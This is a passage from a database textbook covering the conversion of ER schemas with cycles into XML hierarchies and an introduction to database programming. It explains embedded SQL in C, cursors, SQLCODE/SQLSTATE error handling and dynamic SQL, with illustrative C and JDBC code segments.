ous hierarchical document views, each corresponding to a different root and a dif-
ferent XML document structure.


Figure 15
Converting a graph with cycles into a hierarchical (tree) structure: parts (a), (b), and (c) (diagram not reproduced).

6.2 Breaking Cycles to Convert Graphs into Trees
In the previous examples, the subset of the database of interest had no cycles. It is
possible to have a more complex subset with one or more cycles, indicating multiple
relationships among the entities. In this case, it is more difficult to decide how to
create the document hierarchies. Additional duplication of entities may be needed
to represent the multiple relationships. We will illustrate this with an example using
the ER schema in Figure 8.

Suppose that we need the information in all the entity types and relationships in
Figure 8 for a particular XML document, with STUDENT as the root element. Figure
15 illustrates how a possible hierarchical tree structure can be created for this docu-
ment. First, we get a lattice with STUDENT as the root, as shown in Figure 15(a). This
is not a tree structure because of the cycles. One way to break the cycles is to repli-
cate the entity types involved in the cycles. First, we replicate INSTRUCTOR as shown
in Figure 15(b), calling the replica to the right INSTRUCTOR1. The INSTRUCTOR
replica on the left represents the relationship between instructors and the sections
they teach, whereas the INSTRUCTOR1 replica on the right represents the relation-
ship between instructors and the department each works in. After this, we still have
the cycle involving COURSE, so we can replicate COURSE in a similar manner,
leading to the hierarchy shown in Figure 15(c). The COURSE1 replica to the left
represents the relationship between courses and their sections, whereas the
COURSE replica to the right represents the relationship between courses and the
department that offers each course.

In Figure 15(c), we have converted the initial graph to a hierarchy. We can do further
merging if desired (as in our previous example) before creating the final hierarchy
and the corresponding XML schema structure.


6.3 Other Steps for Extracting XML Documents
from Databases

In addition to creating the appropriate XML hierarchy and corresponding XML
schema document, several other steps are needed to extract a particular XML docu-
ment from a database:

1. It is necessary to create the correct query in SQL to extract the desired infor-
mation for the XML document.

2. Once the query is executed, its result must be restructured from the flat rela-
tional form to the XML tree structure.

3. The query can be customized to select either a single object or multiple
objects into the document. For example, in the view in Figure 13, the query
can select a single student entity and create a document corresponding to
that single student, or it may select several—or even all—of the students and
create a document with multiple students.
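The following sketch illustrates the three steps above in Java using JDBC. It runs one flat SQL join and then nests the returned rows into the STUDENT-rooted hierarchy of Figure 13. The connection URL, the credentials, and the relational table and column names (STUDENT, COMPLETED_SECTION, and so on) are assumptions introduced only for illustration; they are not defined in this chapter.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;

public class StudentToXml {
    public static void main(String[] args) throws Exception {
        // Step 1: a flat SQL query over hypothetical UNIVERSITY tables.
        String sql =
            "SELECT s.Name, c.Name AS CourseName, sec.Number, sec.Qtr, sec.Year, cs.Grade " +
            "FROM STUDENT s " +
            "JOIN COMPLETED_SECTION cs ON cs.StudentSsn = s.Ssn " +
            "JOIN SECTION sec ON sec.Number = cs.SectionNumber " +
            "JOIN COURSE c ON c.Number = sec.CourseNumber " +
            "WHERE s.Ssn = ?";
        try (Connection conn = DriverManager.getConnection(
                 "jdbc:oracle:thin:@//dbhost:1521/univ", "user", "password");
             PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, "123456789");            // Step 3: a single student
            StringBuilder xml = new StringBuilder();
            try (ResultSet rs = ps.executeQuery()) {
                // Step 2: restructure the flat rows into the Figure 13 hierarchy:
                // one student element with one section child per returned row.
                while (rs.next()) {
                    if (xml.length() == 0) {
                        xml.append("<student name=\"")
                           .append(rs.getString("Name")).append("\">\n");
                    }
                    xml.append("  <section course=\"").append(rs.getString("CourseName"))
                       .append("\" number=\"").append(rs.getInt("Number"))
                       .append("\" qtr=\"").append(rs.getString("Qtr"))
                       .append("\" year=\"").append(rs.getInt("Year"))
                       .append("\" grade=\"").append(rs.getString("Grade"))
                       .append("\"/>\n");
                }
            }
            if (xml.length() > 0) xml.append("</student>");
            System.out.println(xml);
        }
    }
}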

7 Summary
This chapter provided an overview of the XML standard for representing and
exchanging data over the Internet. First we discussed some of the differences
between various types of data, classifying three main types: structured, semi-struc-
tured, and unstructured. Structured data is stored in traditional databases.
Semistructured data mixes data type names and data values, but the data does not
all have to follow a fixed predefined structure. Unstructured data refers to informa-
tion displayed on the Web, specified via HTML, where information on the types of
data items is missing. We described the XML standard and its tree-structured (hier-
archical) data model, and discussed XML documents and the languages for specify-
ing the structure of these documents, namely, XML DTD (Document Type
Definition) and XML schema. We gave an overview of the various approaches for
storing XML documents, whether in their native (text) format, in a compressed
form, or in relational and other types of databases. Finally, we gave an overview of
the XPath and XQuery languages proposed for querying XML data, and discussed
the mapping issues that arise when it is necessary to convert data stored in tradi-
tional relational databases into XML documents.

Review Questions
1. What are the differences between structured, semistructured, and unstructured data?

2. Under which of the categories in 1 do XML documents fall? What about self-
describing data?


3. What are the differences between the use of tags in XML versus HTML?

4. What is the difference between data-centric and document-centric XML
documents?

5. What is the difference between attributes and elements in XML? List some of
the important attributes used to specify elements in XML schema.

6. What is the difference between XML schema and XML DTD?

Exercises
7. Create part of an XML instance document to correspond to the data stored
in the relational database shown in Figure A.1 such that the XML document
conforms to the XML schema document in Figure 5.

8. Create XML schema documents and XML DTDs to correspond to the hier-
archies shown in Figures 14 and 15(c).

9. Consider the LIBRARY relational database schema in Figure A.5. Create an
XML schema document that corresponds to this database schema.

10. Specify the following views as queries in XQuery on the company XML
schema shown in Figure 5.

a. A view that has the department name, manager name, and manager
salary for every department.

b. A view that has the employee name, supervisor name, and employee
salary for each employee who works in the Research department.

c. A view that has the project name, controlling department name, number
of employees, and total hours worked per week on the project for each
project.

d. A view that has the project name, controlling department name, number
of employees, and total hours worked per week on the project for each
project with more than one employee working on it.

Selected Bibliography
There are so many articles and books on various aspects of XML that it would be
impossible to make even a modest list. We will mention one book: Chaudhri,
Rashid, and Zicari, eds. (2003). This book discusses various aspects of XML and
contains a list of some references to XML research and practice.


Figure A.1
One possible database state for the COMPANY relational database schema (relations EMPLOYEE, DEPARTMENT, DEPT_LOCATIONS, PROJECT, WORKS_ON, and DEPENDENT; data not reproduced).


Figure A.2
Schema diagram for the COMPANY relational database schema.

EMPLOYEE (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno)
DEPARTMENT (Dname, Dnumber, Mgr_ssn, Mgr_start_date)
DEPT_LOCATIONS (Dnumber, Dlocation)
PROJECT (Pname, Pnumber, Plocation, Dnum)
WORKS_ON (Essn, Pno, Hours)
DEPENDENT (Essn, Dependent_name, Sex, Bdate, Relationship)


Figure A.3
An ER schema diagram for the COMPANY database (diagram not reproduced).


Figure A.4
Referential integrity constraints displayed on the COMPANY relational database schema (diagram not reproduced; the relations are those listed in Figure A.2).


Figure A.5
A relational database schema for a LIBRARY database.

BOOK (Book_id, Title, Publisher_name)
BOOK_AUTHORS (Book_id, Author_name)
PUBLISHER (Name, Address, Phone)
BOOK_COPIES (Book_id, Branch_id, No_of_copies)
BOOK_LOANS (Book_id, Branch_id, Card_no, Date_out, Due_date)
LIBRARY_BRANCH (Branch_id, Branch_name, Address)
BORROWER (Card_no, Name, Address, Phone)


Introduction to SQL
Programming Techniques

In this chapter, we discuss some of the methods that have been developed for accessing databases from
programs. Most database access in practical applications is accomplished through
software programs that implement database applications. This software is usually
developed in a general-purpose programming language such as Java, C/C++/C#,
COBOL, or some other programming language. In addition, many scripting lan-
guages, such as PHP and JavaScript, are also being used for programming of data-
base access within Web applications. In this chapter, we focus on how databases can
be accessed from the traditional programming languages C/C++ and Java, whereas
in the next chapter we introduce how databases are accessed from scripting lan-
guages such as PHP and JavaScript. Recall that when database statements are
included in a program, the general-purpose programming language is called the
host language, whereas the database language—SQL, in our case—is called the data
sublanguage. In some cases, special database programming languages are developed
specifically for writing database applications. Although many of these were devel-
oped as research prototypes, some notable database programming languages have
widespread use, such as Oracle’s PL/SQL (Programming Language/SQL).

It is important to note that database programming is a very broad topic. There are
whole textbooks devoted to each database programming technique and how that
technique is realized in a specific system. New techniques are developed all the time,

From Chapter 13 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


and changes to existing techniques are incorporated into newer system versions and
languages. An additional difficulty in presenting this topic is that although there are
SQL standards, these standards themselves are continually evolving, and each
DBMS vendor may have some variations from the standard. Because of this, we
have chosen to give an introduction to some of the main types of database pro-
gramming techniques and to compare these techniques, rather than study one par-
ticular method or system in detail. The examples we give serve to illustrate the main
differences that a programmer would face when using each of these database pro-
gramming techniques. We will try to use the SQL standards in our examples rather
than describe a specific system. When using a specific system, the materials in this
chapter can serve as an introduction, but should be augmented with the system
manuals or with books describing the specific system.

We start our presentation of database programming in Section 1 with an overview
of the different techniques developed for accessing a database from programs. Then,
in Section 2, we discuss the rules for embedding SQL statements into a general-pur-
pose programming language, generally known as embedded SQL. This section also
briefly discusses dynamic SQL, in which queries can be dynamically constructed at
runtime, and presents the basics of the SQLJ variation of embedded SQL that was
developed specifically for the programming language Java. In Section 3, we discuss
the technique known as SQL/CLI (Call Level Interface), in which a library of proce-
dures and functions is provided for accessing the database. Various sets of library
functions have been proposed. The SQL/CLI set of functions is the one given in the
SQL standard. Another library of functions is ODBC (Open Data Base
Connectivity). We do not describe ODBC because it is considered to be the prede-
cessor to SQL/CLI. A third library of functions—which we do describe—is JDBC;
this was developed specifically for accessing databases from Java. In Section 4 we
discuss SQL/PSM (Persistent Stored Modules), which is a part of the SQL standard
that allows program modules—procedures and functions—to be stored by the
DBMS and accessed through SQL. We briefly compare the three approaches to data-
base programming in Section 5, and provide a chapter summary in Section 6.

1 Database Programming: Techniques
and Issues

We now turn our attention to the techniques that have been developed for accessing
databases from programs and, in particular, to the issue of how to access SQL data-
bases from application programs. SQL has language constructs for various database
operations—from schema definition and constraint specification to querying,
updating, and specifying views. Most database systems have an interactive interface
where these SQL commands can be typed directly into a monitor for execution by
the database system. For example, in a computer system where the Oracle RDBMS
is installed, the command SQLPLUS starts the interactive interface. The user can


type SQL commands or queries directly over several lines, ended by a semicolon and
the Enter key (that is, “; <Enter>”). Alternatively, a file of commands can be created
and executed through the interactive interface by typing @<file name>. The system
will execute the commands written in the file and display the results, if any.

The interactive interface is quite convenient for schema and constraint creation or
for occasional ad hoc queries. However, in practice, the majority of database inter-
actions are executed through programs that have been carefully designed and tested.
These programs are generally known as application programs or database applica-
tions, and are used as canned transactions by the end users. Another common use of
database programming is to access a database through an application program that
implements a Web interface, for example, when making airline reservations or
online purchases. In fact, the vast majority of Web electronic commerce applica-
tions include some database access commands.

In this section, first we give an overview of the main approaches to database pro-
gramming. Then we discuss some of the problems that occur when trying to access
a database from a general-purpose programming language, and the typical
sequence of commands for interacting with a database from a software program.

1.1 Approaches to Database Programming
Several techniques exist for including database interactions in application pro-
grams. The main approaches for database programming are the following:

1. Embedding database commands in a general-purpose programming lan-
guage. In this approach, database statements are embedded into the host
programming language, but they are identified by a special prefix. For exam-
ple, the prefix for embedded SQL is the string EXEC SQL, which precedes all
SQL commands in a host language program.1 A precompiler or
preprocessor scans the source program code to identify database state-
ments and extract them for processing by the DBMS. They are replaced in
the program by function calls to the DBMS-generated code. This technique
is generally referred to as embedded SQL.

2. Using a library of database functions. A library of functions is made avail-
able to the host programming language for database calls. For example, there
could be functions to connect to a database, execute a query, execute an
update, and so on. The actual database query and update commands and any
other necessary information are included as parameters in the function calls.
This approach provides what is known as an application programming
interface (API) for accessing a database from application programs.

3. Designing a brand-new language. A database programming language is
designed from scratch to be compatible with the database model and query
language. Additional programming structures such as loops and conditional

1Other prefixes are sometimes used, but this is the most common.


statements are added to the database language to convert it into a full-
fledged programming language. An example of this approach is Oracle’s
PL/SQL.

In practice, the first two approaches are more common, since many applications are
already written in general-purpose programming languages but require some data-
base access. The third approach is more appropriate for applications that have
intensive database interaction. One of the main problems with the first two
approaches is impedance mismatch, which does not occur in the third approach.

1.2 Impedance Mismatch
Impedance mismatch is the term used to refer to the problems that occur because
of differences between the database model and the programming language model.
For example, the practical relational model has three main constructs: columns
(attributes) and their data types, rows (also referred to as tuples or records), and
tables (sets or multisets of records). The first problem that may occur is that the
data types of the programming language differ from the attribute data types that are
available in the data model. Hence, it is necessary to have a binding for each host
programming language that specifies for each attribute type the compatible pro-
gramming language types. A different binding is needed for each programming lan-
guage because different languages have different data types. For example, the data
types available in C/C++ and Java are different, and both differ from the SQL data
types, which are the standard data types for relational databases.

Another problem occurs because the results of most queries are sets or multisets of
tuples (rows), and each tuple is formed of a sequence of attribute values. In the pro-
gram, it is often necessary to access the individual data values within individual
tuples for printing or processing. Hence, a binding is needed to map the query result
data structure, which is a table, to an appropriate data structure in the programming
language. A mechanism is needed to loop over the tuples in a query result in order
to access a single tuple at a time and to extract individual values from the tuple. The
extracted attribute values are typically copied to appropriate program variables for
further processing by the program. A cursor or iterator variable is typically used to
loop over the tuples in a query result. Individual values within each tuple are then
extracted into distinct program variables of the appropriate type.

Impedance mismatch is less of a problem when a special database programming
language is designed that uses the same data model and data types as the database
model. One example of such a language is Oracle’s PL/SQL. The SQL standard also
has a proposal for such a database programming language, known as SQL/PSM. For
object databases, the object data model is quite similar to the data model of the Java
programming language, so the impedance mismatch is greatly reduced when Java is
used as the host language for accessing a Java-compatible object database. Several
database programming languages have been implemented as research prototypes
(see the Selected Bibliography).


1.3 Typical Sequence of Interaction
in Database Programming

When a programmer or software engineer writes a program that requires access to a
database, it is quite common for the program to be running on one computer sys-
tem while the database is installed on another. Recall that a common architecture
for database access is the client/server model, where a client program handles the
logic of a software application, but includes some calls to one or more database
servers to access or update the data.2 When writing such a program, a common
sequence of interaction is the following:

1. When the client program requires access to a particular database, the pro-
gram must first establish or open a connection to the database server.
Typically, this involves specifying the Internet address (URL) of the machine
where the database server is located, plus providing a login account name
and password for database access.

2. Once the connection is established, the program can interact with the data-
base by submitting queries, updates, and other database commands. In gen-
eral, most types of SQL statements can be included in an application
program.

3. When the program no longer needs access to a particular database, it should
terminate or close the connection to the database.

A program can access multiple databases if needed. In some database programming
approaches, only one connection can be active at a time, whereas in other
approaches multiple connections can be established simultaneously.
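For concreteness, the following is a minimal sketch of this three-step sequence using the JDBC library discussed in Section 3.2. The connection URL, account name, and password are placeholders.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class ConnectQueryClose {
    public static void main(String[] args) throws Exception {
        // 1. Open a connection (URL, account, and password are placeholders).
        Connection conn = DriverManager.getConnection(
                "jdbc:oracle:thin:@//dbserver:1521/company", "user", "password");
        try {
            // 2. Interact with the database by submitting commands.
            Statement stmt = conn.createStatement();
            ResultSet rs = stmt.executeQuery("SELECT Fname, Lname FROM EMPLOYEE");
            while (rs.next()) {
                System.out.println(rs.getString("Fname") + " " + rs.getString("Lname"));
            }
        } finally {
            // 3. Close the connection when access is no longer needed.
            conn.close();
        }
    }
}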

In the next three sections, we discuss examples of each of the three main approaches
to database programming. Section 2 describes how SQL is embedded into a pro-
gramming language. Section 3 discusses how function calls are used to access the
database, and Section 4 discusses an extension to SQL called SQL/PSM that allows
general-purpose programming constructs for defining modules (procedures and
functions) that are stored within the database system.3 Section 5 compares these
approaches.

2 Embedded SQL, Dynamic SQL, and SQLJ
In this section, we give an overview of the technique for how SQL statements can be
embedded in a general-purpose programming language. We focus on two lan-
guages: C and Java. The examples used with the C language, known as embedded

2There are two-tier and three-tier architectures; to keep our discussion simple, we will assume a two-tier
client/server architecture here.
3SQL/PSM illustrates how typical general-purpose programming language constructs—such as loops
and conditional structures—can be incorporated into SQL.


SQL, are presented in Sections 2.1 through 2.3, and can be adapted to other pro-
gramming languages. The examples using Java, known as SQLJ, are presented in
Sections 2.4 and 2.5. In this embedded approach, the programming language is
called the host language. Most SQL statements—including data or constraint defi-
nitions, queries, updates, or view definitions—can be embedded in a host language
program.

2.1 Retrieving Single Tuples with Embedded SQL
To illustrate the concepts of embedded SQL, we will use C as the host programming
language.4 When using C as the host language, an embedded SQL statement is dis-
tinguished from programming language statements by prefixing it with the key-
words EXEC SQL so that a preprocessor (or precompiler) can separate embedded
SQL statements from the host language code. The SQL statements within a program
are terminated by a matching END-EXEC or by a semicolon (;). Similar rules apply
to embedding SQL in other programming languages.

Within an embedded SQL command, we may refer to specially declared C program
variables. These are called shared variables because they are used in both the C pro-
gram and the embedded SQL statements. Shared variables are prefixed by a colon (:)
when they appear in an SQL statement. This distinguishes program variable names
from the names of database schema constructs such as attributes (column names)
and relations (table names). It also allows program variables to have the same
names as attribute names, since they are distinguishable by the colon (:) prefix in the
SQL statement. Names of database schema constructs—such as attributes and rela-
tions—can only be used within the SQL commands, but shared program variables
can be used elsewhere in the C program without the colon (:) prefix.

Suppose that we want to write C programs to process the COMPANY database in
Figure A.1 in Appendix: Figures at the end of this chapter. We need to declare pro-
gram variables to match the types of the database attributes that the program will
process. The programmer can choose the names of the program variables; they may
or may not have names that are identical to their corresponding database attributes.
We will use the C program variables declared in Figure 1 for all our examples and
show C program segments without variable declarations. Shared variables are
declared within a declare section in the program, as shown in Figure 1 (lines 1
through 7).5 A few of the common bindings of C types to SQL types are as follows.
The SQL types INTEGER, SMALLINT, REAL, and DOUBLE are mapped to the C types
long, short, float, and double, respectively. Fixed-length and varying-length
strings (CHAR[i], VARCHAR[i]) in SQL can be mapped to arrays of characters (char
[i+1], varchar [i+1]) in C that are one character longer than the SQL type

4Our discussion here also applies to the C++ programming language, since we do not use any of the
object-oriented features, but focus on the database programming mechanism.
5We use line numbers in our code segments for easy reference; these numbers are not part of the actual
code.


Figure 1
C program variables used in the
embedded SQL examples E1 and E2.

0) int loop ;
1) EXEC SQL BEGIN DECLARE SECTION ;
2) varchar dname [16], fname [16], lname [16], address [31] ;
3) char ssn [10], bdate [11], sex [2], minit [2] ;
4) float salary, raise ;
5) int dno, dnumber ;
6) int SQLCODE ; char SQLSTATE [6] ;
7) EXEC SQL END DECLARE SECTION ;

because strings in C are terminated by a NULL character (\0), which is not part of
the character string itself.6 Although varchar is not a standard C data type, it is
permitted when C is used for SQL database programming.

Notice that the only embedded SQL commands in Figure 1 are lines 1 and 7, which
tell the precompiler to take note of the C variable names between BEGIN DECLARE
and END DECLARE because they can be included in embedded SQL statements—as
long as they are preceded by a colon (:). Lines 2 through 5 are regular C program
declarations. The C program variables declared in lines 2 through 5 correspond to
the attributes of the EMPLOYEE and DEPARTMENT tables from the COMPANY data-
base in Figure A.1. The variables declared in line 6—SQLCODE and SQLSTATE—are
used to communicate errors and exception conditions between the database system
and the executing program. Line 0 shows a program variable loop that will not be
used in any embedded SQL statement, so it is declared outside the SQL declare
section.

Connecting to the Database. The SQL command for establishing a connection
to a database has the following form:

CONNECT TO <server name> AS <connection name>
AUTHORIZATION <user account name and password> ;

In general, since a user or program can access several database servers, several con-
nections can be established, but only one connection can be active at any point in
time. The programmer or user can use the <connection name> to change from the
currently active connection to a different one by using the following command:

SET CONNECTION <connection name> ;

Once a connection is no longer needed, it can be terminated by the following com-
mand:

DISCONNECT <connection name> ;

In the examples in this chapter, we assume that the appropriate connection has
already been established to the COMPANY database, and that it is the currently
active connection.

6SQL strings can also be mapped to char* types in C.


Communicating between the Program and the DBMS Using SQLCODE
and SQLSTATE. The two special communication variables that are used by the
DBMS to communicate exception or error conditions to the program are SQLCODE
and SQLSTATE. The SQLCODE variable shown in Figure 1 is an integer variable.
After each database command is executed, the DBMS returns a value in SQLCODE.
A value of 0 indicates that the statement was executed successfully by the DBMS. If
SQLCODE > 0 (or, more specifically, if SQLCODE = 100), this indicates that no
more data (records) are available in a query result. If SQLCODE < 0, this indicates
some error has occurred. In some systems—for example, in the Oracle RDBMS—
SQLCODE is a field in a record structure called SQLCA (SQL communication area),
so it is referenced as SQLCA.SQLCODE. In this case, the definition of SQLCA must
be included in the C program by including the following line:

EXEC SQL include SQLCA ;

In later versions of the SQL standard, a communication variable called SQLSTATE
was added, which is a string of five characters. A value of ‘00000’ in SQLSTATE indicates
no error or exception; other values indicate various errors or exceptions. For
example, ‘02000’ indicates ‘no more data’ when using SQLSTATE. Currently, both
SQLSTATE and SQLCODE are available in the SQL standard. Many of the error and
exception codes returned in SQLSTATE are supposed to be standardized for all SQL
vendors and platforms,7 whereas the codes returned in SQLCODE are not standardized
but are defined by the DBMS vendor. Hence, it is generally better to use
SQLSTATE because this makes error handling in the application programs independent
of a particular DBMS. As an exercise, the reader should rewrite the examples
given later in this chapter using SQLSTATE instead of SQLCODE.

Example of Embedded SQL Programming. Our first example to illustrate
embedded SQL programming is a repeating program segment (loop) that takes as
input a Social Security number of an employee and prints some information from
the corresponding EMPLOYEE record in the database. The C program code is shown
as program segment E1 in Figure 2. The program reads (inputs) an Ssn value and
then retrieves the EMPLOYEE tuple with that Ssn from the database via the embedded
SQL command. The INTO clause (line 5) specifies the program variables into
which attribute values from the database record are retrieved. C program variables
in the INTO clause are prefixed with a colon (:), as we discussed earlier. The INTO
clause can be used in this way only when the query result is a single record; if multiple
records are retrieved, an error will be generated. We will see how multiple
records are handled in Section 2.2.

Line 7 in E1 illustrates the communication between the database and the program
through the special variable SQLCODE. If the value returned by the DBMS in
SQLCODE is 0, the previous statement was executed without errors or exception
conditions. Line 7 checks this and assumes that if an error occurred, it was because
no EMPLOYEE tuple existed with the given Ssn; therefore it outputs a message to
that effect (line 8).

7In particular, SQLSTATE codes starting with the characters 0 through 4 or A through H are supposed to
be standardized, whereas other values can be implementation-defined.

Figure 2
Program segment E1, a C program segment with embedded SQL.

//Program Segment E1:
0) loop = 1 ;
1) while (loop) {
2) prompt("Enter a Social Security Number: ", ssn) ;
3) EXEC SQL
4) select Fname, Minit, Lname, Address, Salary
5) into :fname, :minit, :lname, :address, :salary
6) from EMPLOYEE where Ssn = :ssn ;
7) if (SQLCODE == 0) printf(fname, minit, lname, address, salary)
8) else printf("Social Security Number does not exist: ", ssn) ;
9) prompt("More Social Security Numbers (enter 1 for Yes, 0 for No): ", loop) ;
10) }

In E1 a single record is selected by the embedded SQL query (because Ssn is a key
attribute of EMPLOYEE). When a single record is retrieved, the programmer can
assign its attribute values directly to C program variables in the INTO clause, as in
line 5. In general, an SQL query can retrieve many tuples. In that case, the C program
will typically go through the retrieved tuples and process them one at a time.
The concept of a cursor is used to allow tuple-at-a-time processing of a query result
by the host language program. We describe cursors next.

2.2 Retrieving Multiple Tuples with Embedded SQL Using Cursors
We can think of a cursor as a pointer that points to a single tuple (row) from the
result of a query that retrieves multiple tuples. The cursor is declared when the SQL
query command is declared in the program. Later in the program, an OPEN CURSOR
command fetches the query result from the database and sets the cursor to a
position before the first row in the result of the query. This becomes the current row
for the cursor. Subsequently, FETCH commands are issued in the program; each
FETCH moves the cursor to the next row in the result of the query, making it the
current row and copying its attribute values into the C (host language) program
variables specified in the FETCH command by an INTO clause. The cursor variable is
basically an iterator that iterates (loops) over the tuples in the query result—one
tuple at a time.

To determine when all the tuples in the result of the query have been processed, the
communication variable SQLCODE (or, alternatively, SQLSTATE) is checked. If a
FETCH command is issued that results in moving the cursor past the last tuple in
the result of the query, a positive value (SQLCODE > 0) is returned in SQLCODE,
indicating that no data (tuple) was found (or the string ‘02000’ is returned in
SQLSTATE). The programmer uses this to terminate a loop over the tuples in the
query result. In general, numerous cursors can be opened at the same time. A


CLOSE CURSOR command is issued to indicate that we are done with processing
the result of the query associated with that cursor.

An example of using cursors to process a query result with multiple records is
shown in Figure 3, where a cursor called EMP is declared in line 4. The EMP cursor
is associated with the SQL query declared in lines 5 through 6, but the query is not
executed until the OPEN EMP command (line 8) is processed. The OPEN <cursor name>
command executes the query and fetches its result as a table into
the program workspace, where the program can loop through the individual rows
(tuples) by subsequent FETCH <cursor name> commands (line 9). We assume that
appropriate C program variables have been declared as in Figure 1. The program
segment in E2 reads (inputs) a department name (line 0), retrieves the matching
department number from the database (lines 1 to 3), and then retrieves the employ-
ees who work in that department via the declared EMP cursor. A loop (lines 10 to
18) iterates over each record in the query result, one at a time, and prints the
employee name. The program then reads (inputs) a raise amount for that employee
(line 12) and updates the employee’s salary in the database by the raise amount that
was provided (lines 14 to 16).

This example also illustrates how the programmer can update database records.
When a cursor is defined for rows that are to be modified (updated), we must add

Figure 3
Program segment E2, a C program segment that uses
cursors with embedded SQL for update purposes.

//Program Segment E2:
0) prompt(“Enter the Department Name: “, dname) ;
1) EXEC SQL
2) select Dnumber into :dnumber
3) from DEPARTMENT where Dname = :dname ;
4) EXEC SQL DECLARE EMP CURSOR FOR
5) select Ssn, Fname, Minit, Lname, Salary
6) from EMPLOYEE where Dno = :dnumber
7) FOR UPDATE OF Salary ;
8) EXEC SQL OPEN EMP ;
9) EXEC SQL FETCH from EMP into :ssn, :fname, :minit, :lname, :salary ;
10) while (SQLCODE == 0) {
11) printf(“Employee name is:”, Fname, Minit, Lname) ;
12) prompt(“Enter the raise amount: “, raise) ;
13) EXEC SQL
14) update EMPLOYEE
15) set Salary = Salary + :raise
16) where CURRENT OF EMP ;
17) EXEC SQL FETCH from EMP into :ssn, :fname, :minit, :lname, :salary ;
18) }
19) EXEC SQL CLOSE EMP ;


the clause FOR UPDATE OF <attribute list> in the cursor declaration and list the names of any
attributes that will be updated by the program. This is illustrated in line 7 of code
segment E2. If rows are to be deleted, the keywords FOR UPDATE must be added
without specifying any attributes. In the embedded UPDATE (or DELETE) com-
mand, the condition WHERE CURRENT OF <cursor name> specifies that the cur-
rent tuple referenced by the cursor is the one to be updated (or deleted), as in line
16 of E2.

Notice that declaring a cursor and associating it with a query (lines 4 through 7 in
E2) does not execute the query; the query is executed only when the OPEN <cursor name> command (line 8) is executed. Also notice that there is no need to include
the FOR UPDATE OF clause in line 7 of E2 if the results of the query are to be used
for retrieval purposes only (no update or delete).
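For comparison, the cursor-style loop of E2 can also be expressed with the JDBC library discussed in Section 3.2, where an updatable result set plays a role similar to a cursor declared FOR UPDATE OF Salary. This is only a sketch under the assumption that the driver supports updatable result sets; the connection parameters are placeholders, and the raise amount is hard-coded rather than prompted for.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class RaiseSalaries {
    public static void main(String[] args) throws Exception {
        // Connection parameters are placeholders (assumptions).
        try (Connection conn = DriverManager.getConnection(
                 "jdbc:oracle:thin:@//dbserver:1521/company", "user", "password");
             Statement stmt = conn.createStatement(
                 ResultSet.TYPE_FORWARD_ONLY, ResultSet.CONCUR_UPDATABLE);
             ResultSet rs = stmt.executeQuery(
                 "SELECT Ssn, Fname, Lname, Salary FROM EMPLOYEE WHERE Dno = 5")) {
            while (rs.next()) {                       // like FETCH in a loop
                System.out.println(rs.getString("Fname") + " " + rs.getString("Lname"));
                rs.updateDouble("Salary", rs.getDouble("Salary") + 500.0);
                rs.updateRow();                       // like UPDATE ... WHERE CURRENT OF
            }
        }
    }
}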

General Options for a Cursor Declaration. Several options can be specified
when declaring a cursor. The general form of a cursor declaration is as follows:

DECLARE <cursor name> [ INSENSITIVE ] [ SCROLL ] CURSOR
[ WITH HOLD ] FOR <query specification>
[ ORDER BY <ordering specification> ]
[ FOR READ ONLY | FOR UPDATE [ OF <attribute list> ] ] ;

We already briefly discussed the options listed in the last line. The default is that the
query is for retrieval purposes (FOR READ ONLY). If some of the tuples in the query
result are to be updated, we need to specify FOR UPDATE OF <attribute list> and list
the attributes that may be updated. If some tuples are to be deleted, we need to spec-
ify FOR UPDATE without any attributes listed.

When the optional keyword SCROLL is specified in a cursor declaration, it is possi-
ble to position the cursor in other ways than for purely sequential access. A fetch
orientation can be added to the FETCH command, whose value can be one of NEXT,
PRIOR, FIRST, LAST, ABSOLUTE i, and RELATIVE i. In the latter two commands, i
must evaluate to an integer value that specifies an absolute tuple position within the
query result (for ABSOLUTE i), or a tuple position relative to the current cursor
position (for RELATIVE i). The default fetch orientation, which we used in our exam-
ples, is NEXT. The fetch orientation allows the programmer to move the cursor
around the tuples in the query result with greater flexibility, providing random
access by position or access in reverse order. When SCROLL is specified on the cur-
sor, the general form of a FETCH command is as follows, with the parts in square
brackets being optional:

FETCH [ [ <fetch orientation> ] FROM ] <cursor name> INTO <fetch target list> ;

The ORDER BY clause orders the tuples so that the FETCH command will fetch them
in the specified order. It is specified in a similar manner to the corresponding clause
for SQL queries. The last two options when declaring a cursor (INSENSITIVE and
WITH HOLD) refer to transaction characteristics of database programs.
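A similar facility exists in JDBC, where a scrollable result set corresponds roughly to a cursor declared with SCROLL, and its navigation methods correspond to the fetch orientations. The sketch below assumes a driver that supports scrollable result sets; the connection parameters are placeholders.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class ScrollExample {
    public static void main(String[] args) throws Exception {
        try (Connection conn = DriverManager.getConnection(
                 "jdbc:oracle:thin:@//dbserver:1521/company", "user", "password");
             // Scrollable, insensitive, read-only result set (driver support assumed).
             Statement stmt = conn.createStatement(
                 ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
             ResultSet rs = stmt.executeQuery(
                 "SELECT Fname, Lname FROM EMPLOYEE ORDER BY Lname")) {
            rs.last();          // like FETCH LAST
            rs.absolute(3);     // like FETCH ABSOLUTE 3
            rs.relative(-1);    // like FETCH RELATIVE -1
            rs.previous();      // like FETCH PRIOR
            System.out.println("Current row: " + rs.getRow());
        }
    }
}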


Figure 4
Program segment E3, a C program segment
that uses dynamic SQL for updating a table.

//Program Segment E3:
0) EXEC SQL BEGIN DECLARE SECTION ;
1) varchar sqlupdatestring [256] ;
2) EXEC SQL END DECLARE SECTION ;


3) prompt(“Enter the Update Command: “, sqlupdatestring) ;
4) EXEC SQL PREPARE sqlcommand FROM :sqlupdatestring ;
5) EXEC SQL EXECUTE sqlcommand ;

2.3 Specifying Queries at Runtime Using Dynamic SQL
In the previous examples, the embedded SQL queries were written as part of the
host program source code. Hence, any time we want to write a different query, we
must modify the program code, and go through all the steps involved (compiling,
debugging, testing, and so on). In some cases, it is convenient to write a program
that can execute different SQL queries or updates (or other operations) dynamically
